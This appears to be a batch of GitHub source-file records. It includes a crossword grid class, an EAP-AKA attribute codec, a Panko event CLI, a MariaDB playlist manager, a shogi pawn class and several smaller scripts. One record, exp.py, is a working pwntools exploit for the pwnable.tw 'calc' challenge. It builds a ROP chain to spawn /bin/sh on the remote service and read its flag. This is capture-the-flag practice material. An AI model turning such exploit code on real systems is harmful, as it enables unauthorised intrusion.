[edges[i][0]]\n\t\n\tfor key in edge_y.keys():\n\t\tedge_y[key].sort()\n\t# O(n log n)\n\tkey_order = list(edge_y.keys())\n\tkey_order.sort(reverse=True)\n\t\n\tfor key in key_order:\n\t\tif check in edge_y[key] : \n\t\t\tcheck+=1\n\t\telif (check-1) in edge_y[key]:\n\t\t\tcheck-=1\n\treturn array[check]\n# input\nn, m = tuple(map(int, input().split()))\narray = list(map(int, input().split()))\nedges = [ tuple(map(int, input().split())) for _ in range(m)]\n# output\nprint(output(n, m, edges, array))","repo_name":"Kim-Ju-won/AdvancedAlgorithmTechniques","sub_path":"기말고사/사다리_타기/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28298849182","text":"import streamlit as st\r\n\r\nst.title(\"Welcome to Cat Kibble Box -CKB\")
\r\n\r\nstatus = st.header(\"What would you like to do? \")\r\nkibblepi = st.selectbox(\"Kibble-Box: \", [\"Box001\", \"Box002\", \"Box003\"])\r\n\r\nst.write(\"Your Kibble-box is: \", kibblepi)\r\n\r\noptions = st.multiselect(\"Options available: \", [\"Camera\", \"Email\", \"Eat\"])\r\n\r\nst.write(\"You selected\", len(options), \"options\")\r\n\r\n\r\nst.write(\r\n    f\"\"\"\r\n    \r\n    \r\n    \r\n    \"\"\",\r\n    unsafe_allow_html=True,\r\n)\r\nst.write(\r\n    f\"\"\"\r\n    \r\n    \r\n    \r\n    \"\"\",\r\n    unsafe_allow_html=True,\r\n)\r\n\r\n","repo_name":"devrulls/kibblepi","sub_path":"webapp/webapp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2381750798","text":"import hashlib\nimport hmac\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Union\n\nimport ordering\n\n\nclass AttributeType(Enum):\n    UNKNOWN = 0\n    AT_RAND = 1\n    AT_AUTN = 2\n    AT_RES = 3\n    AT_AUTS = 4\n    AT_PADDING = 6\n    AT_NONCE_MT = 7\n    AT_PERMANENT_ID_REQ = 10\n    AT_MAC = 11\n    AT_NOTIFICATION = 12\n    AT_ANY_ID_REQ = 13\n    AT_IDENTITY = 14\n    AT_VERSION_LIST = 15\n    AT_SELECTED_VERSION = 16\n    AT_FULLAUTH_ID_REQ = 17\n    AT_COUNTER = 19\n    AT_COUNTER_TOO_SMALL = 20\n    AT_NONCE_S = 21\n    AT_CLIENT_ERROR_CODE = 22\n    AT_IV = 129\n    AT_ENCR_DATA = 130\n    AT_NEXT_PSEUDONYM = 132\n    AT_NEXT_REAUTH_ID = 133\n    AT_CHECKCODE = 134\n    AT_RESULT_IND = 135\n\n\n@dataclass\nclass Attribute:\n    \"\"\"\n    Attribute Type\n\n    Indicates the particular type of attribute. The attribute type\n    values are listed in Section 11.\n\n    Length\n\n    Indicates the length of this attribute in multiples of 4 bytes.\n    The maximum length of an attribute is 1024 bytes. The length\n    includes the Attribute Type and Length bytes.\n\n    Value\n\n    The particular data associated with this attribute. This field\n    is always included and it is two or more bytes in length. The
\n    type and length fields determine the format and length of the\n    value field.\n    \"\"\"\n\n    _attribute_code: int\n    _attribute_type: AttributeType\n    length: int\n    value: bytes\n    raw: bytes\n\n    def __init__(\n        self,\n        code: Union[AttributeType, int],\n        value: bytes,\n        raw: Union[bytes, None] = None,\n    ):\n        if isinstance(code, AttributeType):\n            self._attribute_code = code.value\n            self._attribute_type = code\n        else:\n            self._attribute_code = code\n            try:\n                self._attribute_type = AttributeType(code)\n            except ValueError:\n                self._attribute_type = AttributeType.UNKNOWN\n\n        self.length = int((len(value) + 2) / 4)\n        self.value = value\n\n        if raw is None:\n            raw = self.encode()\n        self.raw = raw\n\n    def encode(self) -> bytes:\n        \"\"\"\n        0                   1                   2                   3\n        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n        |Attribute Type |    Length     |     Value...\n        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n        \"\"\"\n        # use the raw code so attributes with unknown types round-trip unchanged\n        return self._attribute_code.to_bytes(1, ordering.BIG) + self.length.to_bytes(1, ordering.BIG) + self.value\n\n    @property\n    def byte_count(self) -> int:\n        return len(self.value) + 2\n\n    @property\n    def attribute_code(self) -> int:\n        return self._attribute_code\n\n    @property\n    def attribute_type(self) -> AttributeType:\n        return self._attribute_type\n\n    @attribute_code.setter\n    def attribute_code(self, value: int):\n        self._attribute_code = value\n        try:\n            self._attribute_type = AttributeType(value)\n        except ValueError:\n            self._attribute_type = AttributeType.UNKNOWN\n\n    @attribute_type.setter\n    def attribute_type(self, value: AttributeType):\n        self._attribute_code = value.value\n        self._attribute_type = value\n\n    @classmethod\n    def decode(cls, payload: bytes):\n        attribute_code = int(payload[0])\n        length = int(payload[1]) * 4\n        offset = 2\n        # the encoded length includes the two header bytes, so the value runs\n        # from the offset up to index length, not offset + length\n        value = payload[offset:length]\n        return Attribute(attribute_code, value, raw=payload)\n\n    def __str__(self) -> str:\n        return (\n            f\"{self.__class__.__name__}(type={self._attribute_type.name}, \"\n            f\"code={self._attribute_code}, length={self.length}, value={self.value})\"\n        )\n\n    def verbose_str(self) -> str:\n        return (\n            f\"{self.__class__.__name__}(type={self._attribute_type.name}, \"\n            f\"code={self._attribute_code}, length={self.length}, value={self.value}, bytes={self.raw})\"\n        )\n\n\n@dataclass\nclass RandAttribute(Attribute):\n    \"\"\"\n    AT_RAND: https://datatracker.ietf.org/doc/html/rfc4187#section-10.6\n\n    rand: 16 bytes (128 bits)\n    \"\"\"\n\n    rand: bytes\n\n    def __init__(self, rand: bytes):\n        value = b\"\\0\" * 2 + rand\n        super().__init__(AttributeType.AT_RAND, value)\n        self.rand = rand\n\n\n@dataclass\nclass AutnAttribute(Attribute):\n    \"\"\"\n    AT_AUTN: https://datatracker.ietf.org/doc/html/rfc4187#section-10.7\n\n    autn: 16 bytes (128 bits)\n    \"\"\"\n\n    autn: bytes\n\n    def __init__(self, autn: bytes):\n        value = b\"\\0\" * 2 + autn\n        super().__init__(AttributeType.AT_AUTN, value)\n        self.autn = autn\n\n\n@dataclass\nclass ResAttribute(Attribute):\n    \"\"\"\n    AT_RES: https://datatracker.ietf.org/doc/html/rfc4187#section-10.8\n\n    res_length: exact length of res in bits\n    res: can vary between 32 and 128 bits and must be a multiple of 4 bytes\n    \"\"\"\n\n    res_length: int\n    res: bytes\n\n    def __init__(self, res: bytes):\n        res_length = len(res) * 8\n        value = res_length.to_bytes(2, ordering.BIG) + res\n        super().__init__(AttributeType.AT_RES, value)\n        self.res_length = res_length\n        self.res = res
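\n\n# A minimal usage sketch (illustrative values only, not taken from the RFC):\n#\n#     attr = ResAttribute(b\"\\x12\\x34\\x56\\x78\")   # 32-bit RES payload\n#     wire = attr.encode()                        # type byte, length byte, value\n#     back = decode_attribute(wire)               # yields a ResAttribute again\n#     assert back.res == attr.res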
\n\n\n@dataclass\nclass MacAttribute(Attribute):\n    \"\"\"\n    AT_MAC: https://datatracker.ietf.org/doc/html/rfc4187#section-10.15\n\n    mac: 16 bytes (128 bits)\n    \"\"\"\n\n    _mac: bytes\n\n    def __init__(self, mac: bytes = b\"\\0\" * 16):\n        value = b\"\\0\" * 2 + mac  # 2 reserved bytes + 16 bytes for MAC\n        super().__init__(AttributeType.AT_MAC, value)\n        self._mac = mac\n\n    def sign(self, key: bytes, message: bytes):\n        digester = hmac.new(key, message, hashlib.sha1)\n        signature = digester.digest()\n        self.mac = signature[:16]\n        self.raw = self.encode()\n\n    @property\n    def mac(self) -> bytes:\n        return self._mac\n\n    def is_set(self) -> bool:\n        return self._mac != b\"\\0\" * 16\n\n    @mac.setter\n    def mac(self, val: bytes):\n        self._mac = val\n        self.value = b\"\\0\" * 2 + val\n\n    def clear(self):\n        self.mac = b\"\\0\" * 16\n\n\ndef decode_attribute(payload: bytes):\n    attribute = Attribute.decode(payload)\n\n    if attribute.attribute_type == AttributeType.AT_RAND:\n        attribute.__class__ = RandAttribute\n        attribute.rand = attribute.value[2:]\n    elif attribute.attribute_type == AttributeType.AT_AUTN:\n        attribute.__class__ = AutnAttribute\n        attribute.autn = attribute.value[2:]\n    elif attribute.attribute_type == AttributeType.AT_RES:\n        attribute.__class__ = ResAttribute\n        attribute.res_length = int.from_bytes(attribute.value[0:2], ordering.BIG)\n        attribute.res = attribute.value[2:]\n    elif attribute.attribute_type == AttributeType.AT_MAC:\n        attribute.__class__ = MacAttribute\n        attribute.mac = attribute.value[2:]\n\n    return attribute\n","repo_name":"NetLync/eap-aka-sample-code","sub_path":"attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13915650349","text":"from __future__ import print_function\nfrom enum import Enum\nfrom bartez.entry import Entry, Coordinate, Orientation, Relation\n\n\nclass SquareValues(Enum):\n    char = u'.'\n    block = u'\\u2588'\n\n\nclass Coordinates(Enum):\n    horizontal = 0\n    vertical = 1\n\n\nclass Direction(Enum):\n    up = 0\n    down = 1\n    right = 2\n    left = 3\n    count = 4\n\n\ndef directions_to_index(direction):\n    conversion = {\n        Direction.up: 0,\n        Direction.down: 1,\n        Direction.right: 2,\n        Direction.left: 3,\n        Direction.count: 4\n    }\n\n    return conversion[direction]\n\n\nclass Square:\n    def __init__(self, x=-1, y=-1, value=SquareValues.char):\n        count = directions_to_index(Direction.count)\n        self.__neighbours = [None for _ in range(count)]\n        self.__value = value\n        self.__point = [x, y]\n\n    def is_block(self):\n        return self.__value == SquareValues.block\n\n    def set_coordinates(self, coordinates):\n        self.__point[0] = coordinates[0]\n        self.__point[1] = coordinates[1]\n\n    def get_coordinates(self):\n        return self.__point[0]\n\n    def set_neighbour(self, direction, neighbour):\n        self.__neighbours[directions_to_index(direction)] = neighbour\n\n    def set_neighbours(self, up, down, left, right):\n        self.__neighbours[directions_to_index(Direction.up)] = up\n        self.__neighbours[directions_to_index(Direction.down)] = down\n        self.__neighbours[directions_to_index(Direction.left)] = left\n        self.__neighbours[directions_to_index(Direction.right)] = right\n\n    def get_neighbour(self, direction):\n        d = directions_to_index(direction)\n        return self.__neighbours[d]\n\n    def set_value(self, value):\n        self.__value = value\n\n    def get_value(self):\n        return self.__value
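\n\n    # Walks away from this square in the given direction, counting the\n    # consecutive non-block squares until a block or the edge of the board\n    # (a None neighbour) is reached; the entry detection in Crossworld\n    # relies on these counts.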
\n    def count_squares_to_block(self, direction):\n        count = 0\n\n        current = self.__neighbours[directions_to_index(direction)]\n\n        while current is not None:\n            if current.is_block():\n                break\n\n            count = count + 1\n            current = current.get_neighbour(direction)\n\n        return count\n\n\nclass Crossworld:\n    def __init__(self, rows=0, columns=0):\n        self.__rows = 0\n        self.__columns = 0\n        self.__grid = []\n        self.__entries = []\n        self.__intersections = []\n        self.set_geometry(rows, columns)\n\n    def set_geometry(self, rows, columns):\n        self.__rows = rows\n        self.__columns = columns\n        self.__grid = [[Square() for _ in range(columns)] for _ in range(rows)]\n\n    def set_value(self, row, column, value):\n        # print \"row: \", row, \" column: \", column, \" value: \", value\n        if row >= self.__rows or column >= self.__columns:\n            return\n\n        self.__grid[row][column] = Square(row, column, value)\n\n    def set_value_from_entry(self, entry):\n        for i, char in enumerate(list(entry.value())):\n            row = entry.x() if entry.horizontal() else entry.x() + i\n            col = entry.y() + i if entry.horizontal() else entry.y()\n            self.__grid[row][col].set_value(char)\n        return\n\n    def get_value(self, row, column):\n        return self.__grid[row][column].get_value()\n\n    def set_blocks(self, blocks):\n        for block in blocks:\n            r = block[0]\n            c = block[1]\n\n            if c >= self.__columns:\n                continue\n\n            if r >= self.__rows:\n                continue\n\n            # mark the square itself as a block; set_value takes a value, not a nested Square\n            self.__grid[r][c].set_value(SquareValues.block)\n\n    def set_entries(self, entries):\n        self.__entries = entries\n\n        for entry in entries:\n            value = entry.get_value()\n            if str('.') in value:\n                continue\n            self.set_value_from_entry(entry)\n\n    def get_entries(self):\n        return self.__entries\n\n    def clear_all_non_blocks(self):\n        for square_column in self.__grid:\n            for square in square_column:\n                if not square.is_block():\n                    square.set_value(SquareValues.char)\n\n    def print_crossword(self):\n        print('')\n\n        for r in range(0, self.__rows):\n            for c in range(0, self.__columns):\n                char = self.__grid[r][c].get_value()\n                if char == SquareValues.block:\n                    \"\"\"\n                    @todo replace unicode value, now it produces codec ascii error\n                    print('\\u2588', end=' '),\n                    \"\"\"\n                    print('#', end=' '),\n                elif char == SquareValues.char:\n                    print(u'.', end=' '),\n                else:\n                    print(char, end=' '),\n\n            print('')\n\n        print('')\n\n    def __update_neighbours(self):\n        for r in range(0, self.__rows):\n            for c in range(0, self.__columns):\n                square = self.__grid[r][c]\n                up, down, right, left = None, None, None, None\n\n                if (r > 0) and (r < self.__rows):\n                    up = self.__grid[r-1][c]\n\n                if (c >= 0) and (c < self.__columns - 1):\n                    right = self.__grid[r][c+1]\n\n                if (r >= 0) and (r < self.__rows - 1):\n                    down = self.__grid[r+1][c]\n\n                if (c > 0) and (c < self.__columns):\n                    left = self.__grid[r][c-1]\n\n                square.set_neighbours(up, down, left, right)\n\n    def __update_entries(self):\n        entries_count = 0\n        for r in range(0, self.__rows):\n            for c in range(0, self.__columns):\n                square = self.__grid[r][c]\n\n                if square.is_block():\n                    continue\n\n                up = square.count_squares_to_block(Direction.up)\n                right = square.count_squares_to_block(Direction.right)\n                down = square.count_squares_to_block(Direction.down)\n                left = square.count_squares_to_block(Direction.left)\n\n                is_vertical = (up == 0) and (down >= 1)\n                is_horizontal = (left == 0) and (right >= 1)\n\n                if not is_horizontal and not is_vertical:\n                    continue\n\n                entries_count += 1\n\n                if is_horizontal:\n                    coordinate = Coordinate(r, c)\n                    orientation = Orientation.horizontal\n                    length = right + 1\n                    number = entries_count\n                    entry = Entry(coordinate, orientation, number, length)\n                    entry.set_description(str(number) + \" Horizontal\")\n                    self.__entries.append(entry)\n\n                if is_vertical:\n                    coordinate = Coordinate(r, c)
\n                    orientation = Orientation.vertical\n                    length = down + 1\n                    number = entries_count\n                    entry = Entry(coordinate, orientation, number, length)\n                    entry.set_description(str(number) + \" Vertical\")\n                    self.__entries.append(entry)\n\n        return len(self.__entries)\n\n    @staticmethod\n    def __get_entry_domain(entry):\n        if entry.horizontal():\n            entry_domain = [Coordinate(entry.x(), entry.y() + i) for i in range(entry.length())]\n        else:\n            entry_domain = [Coordinate(entry.x() + i, entry.y()) for i in range(entry.length())]\n        return entry_domain\n\n    def __update_entries_relations(self):\n        entries_count = len(self.__entries)\n        intersection_matrix = [[-1 for _ in range(entries_count)] for _ in range(entries_count)]\n\n        for index_entry, entry in enumerate(self.__entries, start=0):\n            entry.remove_all_relations()\n            entry_domain = self.__get_entry_domain(entry)\n\n            for index_other, other in enumerate(self.__entries, start=0):\n                if entry == other:\n                    continue\n\n                if entry.get_orientation() == other.get_orientation():\n                    continue\n\n                other_domain = self.__get_entry_domain(other)\n\n                intersection = []\n                for coordinate_e in entry_domain:\n                    for coordinate_o in other_domain:\n                        if coordinate_e.x() == coordinate_o.x() and coordinate_e.y() == coordinate_o.y():\n                            intersection.append(coordinate_e)\n\n                if len(intersection) == 0:\n                    continue\n\n                assert len(intersection) == 1\n\n                coordinate = intersection[0]\n                # the position along an entry varies with its orientation:\n                # columns for horizontal entries, rows for vertical ones\n                pos_in_entry = coordinate.y() - entry.y() if entry.horizontal() else coordinate.x() - entry.x()\n                pos_in_other = coordinate.y() - other.y() if other.horizontal() else coordinate.x() - other.x()\n                intersection_matrix[pos_in_entry][pos_in_other] = pos_in_entry\n                relation = Relation(index_other, coordinate)\n                entry.add_relation(relation)\n\n        self.__intersections = intersection_matrix\n        return\n\n    def get_intersection_matrix(self):\n        return self.__intersections\n\n    def __get_intersection(self, index_entry, index_other):\n        return self.__intersections[index_entry][index_other]\n\n    def __print_neighbours(self):\n        for r in range(0, self.__rows):\n            for c in range(0, self.__columns):\n                square = self.__grid[r][c]\n                print(\"Square: \", r, \", \", c)\n                print(\" up\", square.get_neighbour(Direction.up))\n                print(\" right\", square.get_neighbour(Direction.right))\n                print(\" down\", square.get_neighbour(Direction.down))\n                print(\" left\", square.get_neighbour(Direction.left))\n\n    def __print_entries(self):\n        for index, entry in enumerate(self.__entries):\n            print(index, \": \", entry.get_description())\n        return\n\n    def __print_entries_relations(self):\n        return\n\n    def prepare(self):\n        self.__update_neighbours()\n        self.__update_entries()\n        self.__update_entries_relations()\n        self.print_info()\n        return\n\n    def print_info(self):\n        #print \"*** Neighbours ***\"\n        #self.__print_neighbours()\n\n        print(\"*** Entries ***\")\n        self.__print_entries()\n\n    entries = get_entries\n    get_intersection = __get_intersection\n","repo_name":"crsnplusplus/bartez","sub_path":"bartez/crossword.py","file_name":"crossword.py","file_ext":"py","file_size_in_byte":10287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31390751229","text":"import os\n\nDEBUG = False # this guy is a flag for extra messaging while debugging tests\n\n#NOTE: Logger and Platform are initialized in TestRunner's main()\nLogger = None\nPlatform = None\n\n''' Testing paths '''\ncurrentPath = os.path.dirname(__file__) # should go to .\solutions-geoprocessing-toolbox\utils\test\nrepoPath =
os.path.dirname(os.path.dirname(currentPath))\n\n''' Log Path: the folder where the log files go wild and multiply '''\nlogPath = os.path.normpath(os.path.join(currentPath, r\"log\")) # should go to .\\solutions-geoprocessing-toolbox\\utils\\test\\log\n\n''' Capability Paths'''\ncapabilityPath = os.path.normpath(os.path.join(currentPath, r\"capability_tests\"))\n\npooURL = r\"http://www.arcgis.com/sharing/content/items/9d8a534a70d54a74911d9ddb60b5a1d9/data\"\n\n''' Data Management Paths '''\ndataManagementPaths = os.path.normpath(os.path.join(currentPath, r\"data_management_tests\"))\ngeonamesURL = r\"http://www.arcgis.com/sharing/content/items/afc766d5276648ab80aa85b819af1ffc/data\"\nnetworkPrepURL = r\"http://www.arcgis.com/sharing/content/items/cf09da3684214d2b9b18c22149130fc4/data\"\npatrolDataCaptureURL = r\"http://www.arcgis.com/sharing/content/items/853736d171e44a40a55e4c312bf43b66/data\"\nimportAndConversionURL = r\"http://www.arcgis.com/sharing/content/items/130f52ac95a040cb80717d99db100409/data\"\npublishableTasksURL = r\"http://www.arcgis.com/sharing/content/items/921fc6d5f5e2444dab14831edc01ef9d/data\"\n\n''' Operational Graphics Paths '''\noperationalGraphicsPaths = os.path.normpath(os.path.join(currentPath, r\"operational_graphics_tests\"))\nclearingOperationsURL = r\"http://www.arcgis.com/sharing/content/items/198f01e263474c209198c9c3c3586287/data\"\nsunPositionAnalysisURL = r\"http://www.arcgis.com/sharing/content/items/bf6a04b4c9a3447b91e9c0b4074ca1e4/data\"\nrangeCardURL = r\"http://www.arcgis.com/sharing/content/items/f5414250daf14dd389cc50199efeef8d/data\"\n\n\n''' Patterns Paths '''\npatternsPaths = os.path.normpath(os.path.join(currentPath, r\"patterns_tests\"))\nincidentDataPath = None\nincidentInputGDB = None\nincidentScratchGDB = None\npatterns_ToolboxesPath = os.path.normpath(os.path.join(currentPath, r\"../../patterns/toolboxes/\"))\npatterns_ProToolboxPath = os.path.normpath(os.path.join(patterns_ToolboxesPath, \"Incident Analysis Tools.tbx\"))\npatterns_DesktopToolboxPath = os.path.normpath(os.path.join(patterns_ToolboxesPath, \"Incident Analysis Tools_10.4.tbx\"))\nincidentURL = \"http://www.arcgis.com/sharing/content/items/528faf6b23154b04a8268b33196fa9ad/data\"\nincidentGDBName = \"test_incident_analysis_tools.gdb\"\n\n''' Suitability Paths '''\nsuitabilityPaths = os.path.normpath(os.path.join(currentPath, r\"suitability_tests\"))\nsuitabilityDataPath = None\nsuitability_ToolboxesPath = os.path.normpath(os.path.join(currentPath, r\"../../suitability/toolboxes/\"))\nmaritimeDataPath = None\nmaritimeScratchGDB = None\nmaow_ToolboxPath = os.path.join(suitability_ToolboxesPath, \"Military Aspects of Weather Tools_10.4.tbx\")\nmaotURL = r\"http://www.arcgis.com/sharing/content/items/127bff2341694342a6df884aaa51237e/data\"\nmaowURL = \"http://www.arcgis.com/sharing/content/items/74eeb356c7dd4422bf52f36f38bb8a9b/data\"\nmaritime_DesktopToolboxPath = os.path.join(suitability_ToolboxesPath, \"Maritime Decision Aid Tools_10.4.tbx\")\nmaritime_ProToolboxPath = os.path.join(suitability_ToolboxesPath, \"Maritime Decision Aid Tools.tbx\")\nmaritimeURL = \"http://www.arcgis.com/sharing/content/items/43fbe3e823614783a391676d47dd3c5f/data\"\nmaritimeGDBName = \"MaritimeDecisionAidToolsTestData\"\npathSlopeURL = r\"http://www.arcgis.com/sharing/content/items/cbb812326b6f4fb2b77cac4a85e734a9/data\"\n\n''' Visibility Paths '''\nvisibilityPaths = os.path.normpath(os.path.join(currentPath, r\"visibility_tests\"))\nvis_ToolboxesPath = os.path.normpath(os.path.join(currentPath, 
r\"../../visibility/toolboxes/\"))\n\n\n\n","repo_name":"giserh/solutions-geoprocessing-toolbox","sub_path":"utils/test/Configuration.py","file_name":"Configuration.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"9632543574","text":"from pwn import *\ndef cal(c):\n\tp.sendline(c)\neax=0x0805c34b\nppp=0x080701d0\nint0x80=0x08049a21\nread=0x806E6D0\nbss=0x080ebf40+0x100\n#p=process(\"./calc\")\np=remote(\"chall.pwnable.tw\",10100)\n#gdb.attach(p,'b *0x80494a6')\naim=(0xffffd06c-0xffffcaf8)/4+19\n\ncal(\"+{}+1*{}-1*{}\".format(str(aim),str(read+ppp),str(ppp)))\ncal(\"+{}-1*{}-1*{}-1*{}-1*{}+1*{}-1*{}\".format(str(aim+2),str(bss),str(bss+100),str(100+ppp),str(ppp),str(1),str(1)))\ncal(\"+{}+1*{}-1*{}+1*{}+1*{}-1*{}\".format(str(aim+2+5),str(bss),str(bss-eax),str(eax-0xb),str(0xb+int0x80),str(int0x80)))\n\np.sendline(\"nier\")\np.send(\"/bin/sh\\x00\\n\")\nsleep(3)\np.sendline(\"cat /home/calc/flag\")\np.interactive()\n\n\n","repo_name":"n132/Watermalon","sub_path":"pwnable_tw/calc/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"14248438320","text":"from schematics import Model\nfrom schematics.types import IntType, StringType\n\nfrom yawsm.infrastructure.websocket.request import validate\nfrom yawsm.work.model import ALL_STATUSES\nfrom yawsm.worker.actions.work_is_done.usecase import WorkIsDoneDto\n\n\nclass WorkIsDoneSchema(Model):\n    work_id = IntType(required=True)\n    status = StringType(\n        required=True,\n        choices=['KILLED', 'DONE']\n    )\n    output = StringType()\n    exit_code = IntType()\n\n\nclass WorkIsDoneController:\n    def __init__(self, usecase):\n        self.usecase = usecase\n\n    @validate(schema=WorkIsDoneSchema)\n    async def handle(self, request):\n        dto = WorkIsDoneDto(\n            worker_socket=request.peer,\n            work_id=request.validated.work_id,\n            status=request.validated.status,\n            output=request.validated.output,\n            exit_code=request.validated.exit_code\n        )\n        await self.usecase.perform(dto)\n","repo_name":"mwalercz/yawsm","sub_path":"yawsm/worker/actions/work_is_done/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30837334759","text":"import copy\n\nimport json\n\nfrom osc_lib.command import command\nfrom osc_lib import utils\n\n\nclass EventList(command.Lister):\n    \"\"\"List events\"\"\"\n\n    @staticmethod\n    def split_filter_param(param):\n        key, eq_op, value = param.partition('=')\n        if not eq_op:\n            msg = 'Malformed parameter(%s). Use the key=value format.' % param\n            raise ValueError(msg)\n        return key, value\n\n    def get_parser(self, prog_name):\n        parser = super(EventList, self).get_parser(prog_name)\n        parser.add_argument('--filter', dest='filter',\n                            metavar='',\n                            type=self.split_filter_param,\n                            action='append',\n                            help='Filter parameters to apply on'\n                                 ' returned events.')\n        parser.add_argument(\"--limit\", type=int, metavar=\"\",\n                            help=\"Number of events to return \"\n                                 \"(Default is server default)\")\n        parser.add_argument(\"--marker\", metavar=\"\",\n                            help=\"Last item of the previous listing. \"\n                                 \"Return the next results after this value,\"\n                                 \"the supported marker is message_id.\")\n        parser.add_argument(\"--sort\", action=\"append\",\n                            metavar=\"\",\n                            help=\"Sort of events attribute, \"
\n                                 \"e.g. name:asc\")\n        return parser\n\n    def take_action(self, parsed_args):\n        ac = self.app.client_manager.event\n        filters = dict(parsed_args.filter) if parsed_args.filter else None\n        events = ac.event.list(\n            filters=filters, sorts=parsed_args.sort,\n            limit=parsed_args.limit, marker=parsed_args.marker)\n        columns = ('event_type', 'generated', 'message_id', 'traits')\n        formatters = {'traits': lambda s: json.dumps(s, indent=4)}\n        return (columns,\n                (utils.get_item_properties(\n                    s, columns, formatters=formatters) for s in events))\n\n\nclass EventShow(command.ShowOne):\n    \"\"\"Show an event\"\"\"\n\n    def get_parser(self, prog_name):\n        parser = super(EventShow, self).get_parser(prog_name)\n        parser.add_argument(\n            'message_id',\n            metavar='',\n            help=\"event of specified message_id to display\"\n        )\n        return parser\n\n    def take_action(self, parsed_args):\n        ac = self.app.client_manager.event\n        event = ac.event.get(message_id=parsed_args.message_id)\n        data = copy.deepcopy(event._info)\n        data.update({'traits': json.dumps(data['traits'], indent=4)})\n        return self.dict2columns(data)\n","repo_name":"liusheng/python-pankoclient","sub_path":"pankoclient/osc/v2/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28758104806","text":"from __future__ import unicode_literals\nimport mariadb\nimport json\nfrom pathlib import Path\nclass DbManager:\n    def __init__(self):\n        #load config\n        path = Path(__file__).parent.absolute()\n        configpath = '{}/config.json'.format(path)\n        with open(configpath) as file:\n            config = json.load(file)\n\n        self.dbcon = mariadb.connect(\n            host=config['host'],\n            user=config['user'],\n            password=config['password'],\n            database=config['database'],\n        )\n\n    #\n    # save list to database\n    #\n    def insertListToDB(self,url_list):\n        mycursor = self.dbcon.cursor()\n        query = \"INSERT IGNORE INTO video_list(url_id,title) values(%(id)s,%(title)s)\"\n        # query = \"INSERT IGNORE INTO video_list set url_id=%(id)s, title=%(title)s\"\n\n        list = url_list\n        count = 0\n        for i, item in enumerate(list):\n            if list is not None:\n                urlBasename = list[i]['id'] if list is not None else None\n                print('checking ', urlBasename)\n                val = (list[i])\n                mycursor.execute(query,val)\n                self.dbcon.commit()\n                if mycursor.rowcount > 0:\n                    print(urlBasename,' inserted')\n                    count+=1\n                # else:\n                #     print('no data, skipped')\n\n        print(count, \" new record inserted.\")\n\n    #\n    # Get video list from db which hasn't been downloaded yet\n    #\n    def getListUndownloadFromDB(self):\n        mycursor = self.dbcon.cursor(dictionary=True)\n        query = \"select * from video_list where is_downloaded = 0\"\n        mycursor.execute(query)\n        myresult = mycursor.fetchall()\n\n        return myresult\n\n    #\n    # update is_downloaded\n    #\n    def updateDownloadedToDB(self,current_download_url_id):\n        mycursor = self.dbcon.cursor()\n        url_id = current_download_url_id\n        query = \"UPDATE video_list set is_downloaded=1 where url_id=%s\"\n        val=([url_id])\n        mycursor.execute(query,val)\n        self.dbcon.commit()\n        print(mycursor.rowcount, \"record updated.\")","repo_name":"akzn/youtube-playlist-manager","sub_path":"dbmanager.py","file_name":"dbmanager.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69917705690","text":"from .Pieces import *\n\n# The Pion (pawn) class inherits from the Pieces class\nclass Pion(Pieces):\n\n    # Call the Pieces constructor\n    ### Add pionMouvement to the constructor?
\n    def __init__(self, square, image, cote, type, row, col):\n        super().__init__(square, image, cote, type, row, col)\n\n    # Method producing the list of possible moves for this piece (here the pawn)\n    # The piece's moves are first reset when it is picked up,\n    # then its movement direction is set according to its side of the board (Regnant or Opposant)\n    ### The method could be simplified completely (for later)\n    def getAvailableMoves(self, row, col, Board):\n        self.clearAvailableMoves()\n\n        pionMouvement = 0\n\n        if self.cote == Joueur.Regnant:  # If Regnant, the player is at the bottom of the board\n\n            pionMouvement = -1\n\n            if row + pionMouvement >= 0:  # If the pawn can move forward (not at the edge of the board):\n                if Board[row + pionMouvement][col] == 0:  # If there is no piece in front of the pawn\n                    self.availableMoves.append((row + pionMouvement, col))  # It can move forward\n                else:\n                    piece = Board[row + pionMouvement][col]\n                    if piece.cote != self.cote:  # Otherwise, if the piece is an enemy piece\n                        self.availableMoves.append((row + pionMouvement, col))  # It can move forward\n\n        if self.cote == Joueur.Opposant:  # If Opposant, the player is at the top of the board\n\n            pionMouvement = 1\n\n            if row + pionMouvement < len(Board):\n                if Board[row + pionMouvement][col] == 0:\n                    self.availableMoves.append((row + pionMouvement, col))\n                else:\n                    piece = Board[row + pionMouvement][col]\n                    if piece.cote != self.cote:\n                        self.availableMoves.append((row + pionMouvement, col))\n\n        return self.availableMoves","repo_name":"enzo1000/Shogi","sub_path":"Shogi/Shogi/src/pieces/Pion.py","file_name":"Pion.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 